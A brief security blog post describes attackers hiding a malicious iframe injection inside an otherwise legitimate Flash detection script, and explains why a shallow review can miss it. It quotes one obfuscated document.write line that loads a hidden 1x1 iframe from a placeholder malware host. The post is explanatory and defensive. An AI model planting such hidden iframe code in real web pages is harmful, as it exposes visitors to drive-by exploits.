Hiding Web 2.0 Malware In Plain Sight
Hello everyone, Jeff Forristal here. I thought I'd take a moment to discuss a trend we're seeing in attacker tactics, and predict how it may evolve into what will become commonplace tomorrow.
document.write("<i"+"fr"+"ame src='http://__someplace__.com/ pdfdoc/index.php?id=com2' width=1 height=1></ifr"+"am"+"e>");
This causes the script to write out an IFrame tag that pointed to a malware site which then tried to deliver exploits to the browser in an attempt to cause arbitrary code execution.
I'm willing to speculate that anyone doing a shallow/naive review of the script could prematurely conclude that the script is the proper Adobe Flash detection script and thus dismiss it as non-evil. Hopefully though many investigators would plow through the entire file and eventually see the plain-as-day extra IFrame code added, and thus see through the facade.
It’s a hard problem still looking for a perfect solution (like many other security problems). Until next time,